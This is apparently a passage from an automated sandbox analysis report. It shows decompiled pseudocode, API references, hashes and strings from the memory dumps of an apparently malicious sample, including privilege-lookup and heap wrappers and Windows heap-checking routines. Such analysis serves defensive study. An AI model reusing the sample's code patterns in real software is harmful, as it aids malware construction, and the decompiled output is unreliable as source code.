				}
			}

0x0041a1c6
0x0041a1a1
0x0041a1a7
0x0041a1ae
0x0041a1c0
0x0041a1c8
0x0041a1c8
0x0041a1ca
0x0041a1cd
0x0041a1cd
0x0041a1d1
0x0041a1d3
0x0041a1d6
0x0041a1e2
0x0041a1ea
0x0041a1ef
0x0041a1f2
0x0041a1f5
0x0041a1fc
0x0041a200
0x0041a202
0x0041a203
0x0041a204
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 71b008811e7eb22941acd3a83fa698d2989a21c35c06f682cec1c7bd0b2ddd2e
Instruction ID: 5e876629a821ffc6391a26ddbcb153cc47e541d699c30c05772f0983f65afc96
Opcode Fuzzy Hash: 71b008811e7eb22941acd3a83fa698d2989a21c35c06f682cec1c7bd0b2ddd2e
Instruction Fuzzy Hash: 8F01DCB16042447BEB14DF95DC84DE777A8EF88220F04829DFD0C8B642CA34A8248BB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a07f
0x0041a087
0x0041a09d
0x0041a0a1

APIs

RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D

Memory Dump Source

Source File: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a047
0x0041a05d
0x0041a061

APIs

RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D

Memory Dump Source

Source File: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1ea
0x0041a200
0x0041a204

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200

Memory Dump Source

Source File: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A0B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041A960(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0041a0b3
0x0041a0ca
0x0041a0d8

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8

Memory Dump Source

Source File: 00000001.00000001.232707868.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 00AB967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00AB9694

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
Instruction ID: 8a38b42fe32e271f9afc1009965e08f4e64431d8948f43410f85fe4134f53a69
Opcode Fuzzy Hash: 4d2d194e6a57148b6a4a1be8097b0a880b9f46234164c1dea7e9ef2aa955721e
Instruction Fuzzy Hash: 8FB092B29064C5CAEB11E7B04A08B2B7E04BBE0741F27C076E2120681B4778C491F6B6

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B2B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00B2B305
*** Resource timeout (%p) in %ws:%s, xrefs: 00B2B352
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B2B38F
Go determine why that thread has not released the critical section., xrefs: 00B2B3C5
The instruction at %p tried to %s , xrefs: 00B2B4B6
*** then kb to get the faulting stack, xrefs: 00B2B51C
The critical section is owned by thread %p., xrefs: 00B2B3B9
*** An Access Violation occurred in %ws:%s, xrefs: 00B2B48F
This failed because of error %Ix., xrefs: 00B2B446
*** A stack buffer overrun occurred in %ws:%s, xrefs: 00B2B2F3
<unknown>, xrefs: 00B2B27E, 00B2B2D1, 00B2B350, 00B2B399, 00B2B417, 00B2B48E
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 00B2B314
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B2B3D6
an invalid address, %p, xrefs: 00B2B4CF
write to, xrefs: 00B2B4A6
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00B2B476
The resource is owned exclusively by thread %p, xrefs: 00B2B374
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00B2B53F
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00B2B323
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 00B2B39B
*** Inpage error in %ws:%s, xrefs: 00B2B418
a NULL pointer, xrefs: 00B2B4E0
*** enter .cxr %p for the context, xrefs: 00B2B50D
*** enter .exr %p for the exception record, xrefs: 00B2B4F1
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 00B2B2DC
The resource is owned shared by %d threads, xrefs: 00B2B37E
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00B2B47D
read from, xrefs: 00B2B4AD, 00B2B4B2
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00B2B484
The instruction at %p referenced memory at %p., xrefs: 00B2B432

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: f7a00d8126b01053dae7aba2a6fdbc60b60629a1e1198b53afdff5e6b942f783
Instruction ID: e2c159cba1463297c27d0e261459a24878d746ce067a84c4e7a48255972c9e3b
Opcode Fuzzy Hash: f7a00d8126b01053dae7aba2a6fdbc60b60629a1e1198b53afdff5e6b942f783
Instruction Fuzzy Hash: 7F811775A00220FFCB21AA05EC8AD6B3FB5EF56B91F4144C4F4082B293DB658D11EB72

Uniqueness

Uniqueness Score: -1.00%

Function 00B31C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00B31C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xa548a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A7B150();
				} else {
					E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xb6589c);
				E00A7B150("Heap error detected at %p (heap handle %p)\n",  *0xb658a0);
				_t27 =  *0xb65898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00B31E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A7B150();
				} else {
					E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00A7B150("Error code: %d - %s\n",  *0xb65898);
				_t113 =  *0xb658a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A7B150();
					} else {
						E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A7B150("Parameter1: %p\n",  *0xb658a4);
				}
				_t115 =  *0xb658a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A7B150();
					} else {
						E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A7B150("Parameter2: %p\n",  *0xb658a8);
				}
				_t117 =  *0xb658ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A7B150();
					} else {
						E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00A7B150("Parameter3: %p\n",  *0xb658ac);
				}
				_t119 =  *0xb658b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00A7B150();
					} else {
						E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xb658b4);
					E00A7B150("Last known valid blocks: before - %p, after - %p\n",  *0xb658b0);
				} else {
					_t120 =  *0xb658b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00A7B150();
				} else {
					E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00A7B150("Stack trace available at %p\n", 0xb658c0);
			}

0x00b31c10
0x00b31c16
0x00b31c1e
0x00b31c3d
0x00b31c3e
0x00b31c20
0x00b31c35
0x00b31c3a
0x00b31c44
0x00b31c55
0x00b31c5a
0x00b31c65
0x00b31c67
0x00000000
0x00b31c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b31c67
0x00b31cdc
0x00b31ce5
0x00b31d04
0x00b31d05
0x00b31ce7
0x00b31cfc
0x00b31d01
0x00b31d0b
0x00b31d17
0x00b31d1f
0x00b31d25
0x00b31d30
0x00b31d4f
0x00b31d50
0x00b31d32
0x00b31d47
0x00b31d4c
0x00b31d61
0x00b31d67
0x00b31d68
0x00b31d6e
0x00b31d79
0x00b31d98
0x00b31d99
0x00b31d7b
0x00b31d90
0x00b31d95
0x00b31daa
0x00b31db0
0x00b31db1
0x00b31db7
0x00b31dc2
0x00b31de1
0x00b31de2
0x00b31dc4
0x00b31dd9
0x00b31dde
0x00b31df3
0x00b31df9
0x00b31dfa
0x00b31e00
0x00b31e0a
0x00b31e13
0x00b31e32
0x00b31e33
0x00b31e15
0x00b31e2a
0x00b31e2f
0x00b31e39
0x00b31e4a
0x00b31e02
0x00b31e02
0x00b31e08
0x00000000
0x00000000
0x00b31e08
0x00b31e5b
0x00b31e7a
0x00b31e7b
0x00b31e5d
0x00b31e72
0x00b31e77
0x00b31e95

Strings

heap_failure_internal, xrefs: 00B31C6E
Parameter2: %p, xrefs: 00B31DA5
Parameter1: %p, xrefs: 00B31D5C
heap_failure_entry_corruption, xrefs: 00B31C83
heap_failure_multiple_entries_corruption, xrefs: 00B31C8A
heap_failure_buffer_underrun, xrefs: 00B31C9F
heap_failure_unknown, xrefs: 00B31C75
Last known valid blocks: before - %p, after - %p, xrefs: 00B31E45
Heap error detected at %p (heap handle %p), xrefs: 00B31C50
heap_failure_block_not_busy, xrefs: 00B31CA6
heap_failure_freelists_corruption, xrefs: 00B31CC9
Error code: %d - %s, xrefs: 00B31D12
heap_failure_usage_after_free, xrefs: 00B31CBB
HEAP: , xrefs: 00B31C16, 00B31C3D, 00B31D04, 00B31D4F, 00B31D98, 00B31DE1, 00B31E32, 00B31E7A
Parameter3: %p, xrefs: 00B31DEE
heap_failure_virtual_block_corruption, xrefs: 00B31C91
heap_failure_invalid_argument, xrefs: 00B31CAD
HEAP[%wZ]: , xrefs: 00B31C30, 00B31CF7, 00B31D42, 00B31D8B, 00B31DD4, 00B31E25, 00B31E6D
heap_failure_generic, xrefs: 00B31C7C
heap_failure_invalid_allocation_type, xrefs: 00B31CB4
heap_failure_cross_heap_operation, xrefs: 00B31CC2
Stack trace available at %p, xrefs: 00B31E86
heap_failure_buffer_overrun, xrefs: 00B31C98
heap_failure_listentry_corruption, xrefs: 00B31CD0
heap_failure_lfh_bitmap_mismatch, xrefs: 00B31CD7

Memory Dump Source

Source File: 00000001.00000002.288306142.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 743aafd5e96dd49cf2e44977f0c3f770490b9f2ac335893a3833525e95c3467f
Instruction ID: baf0a6610db67397e82155f325affcaf87065c5a7975afe87fdcc86cef12b217
Opcode Fuzzy Hash: 743aafd5e96dd49cf2e44977f0c3f770490b9f2ac335893a3833525e95c3467f
Instruction Fuzzy Hash: 0361C53A561584DFC311DB4CD995E2073F8FB04B21FA9C8BAF80E5F651EB749C408A19

Uniqueness

Uniqueness Score: -1.00%

Function 00B34AEF, Relevance: 11.8, Strings: 9, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E00B34AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E00A7B150();
						} else {
							E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E00A7B150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00A7B150();
					} else {
						E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E00B2FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E00A7B150();
						} else {
							E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E00A7B150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E00A7B150();
								} else {
									E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E00A7B150();
									} else {
										E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E00A7B150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E00B2FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E00A7B150();
										} else {
											E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E00ACD540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E00A7B150();
								} else {
									E00A7B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
